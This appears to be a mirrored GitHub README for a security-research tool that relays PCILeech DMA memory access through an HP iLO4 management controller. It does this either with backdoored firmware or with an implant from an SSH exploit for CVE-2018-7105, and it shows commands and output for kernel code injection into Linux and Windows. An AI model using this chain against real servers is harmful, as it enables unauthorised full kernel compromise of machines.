Giter Club home page Giter Club logo

pcileech_hpilo4_service's Introduction

PCILeech HP iLO4 Service

This is a Python service relaying read and write queries from PCILeech to an HP iLO4 device flashed with a modified firmware.

Usage

$ python run.py -h
usage: run.py [-h] [-m MODULE] [-u USER] [-p PASSWORD] [-P PORT] [-v]
              remote_addr

HP iLO4 PCILeech service

positional arguments:
  remote_addr           IP address of the target iLO4 interface

optional arguments:
  -h, --help            show this help message and exit
  -m MODULE, --module MODULE
                        Module to use (backdoor, ssh_exploit)
  -u USER, --user USER  user name
  -p PASSWORD, --password PASSWORD
                        SSH password
  -P PORT, --port PORT  SSH port
  -v, --verbose         verbosity

Modules

backdoor

This modules uses the modified firmware developped as a demonstration for the SSTIC presentation.

Tools to build and flash this firmware are available on the ilo4_toolbox repository.

/pcileech_hpilo4_service$ python run.py -m backdoor 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd LINUX_X64_48 

 Current Action: Scanning for Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       748 / 268435422 (0%)
 Speed:          6 MB/s
 Address:        0x000000002FA00000
 Pages read:     191488 / 68719468032 (0%)
 Pages failed:   0 (0%)

 Current Action: Verifying Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       32 / 32 (100%)
 Speed:          1 MB/s
 Address:        0x0000000031A00000
 Pages read:     8192 / 8192 (100%)
 Pages failed:   0 (0%)
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x76680000

real    2m38.038s

ssh_exploit

This modules uses the in-memory implant installed by the SSH service exploit (CVE-2018-7105) written by IooNag.

The exploit is available on the ilo4_toolbox repository and should be run before using this service.

Dumping large amounts of memory using this modules is not recommended. Therefore, don't use it for a Linux system since dumping 16MB of kernel memory is required.

/pcileech_hpilo4_service$ python run.py -v -m ssh_exploit -u admin -p password 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd WIN10_X64

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffe000

real	1m0.826s
user	0m0.000s
sys	0m0.010s

pcileech_hpilo4_service's People

Contributors

f4bsynacktiv avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.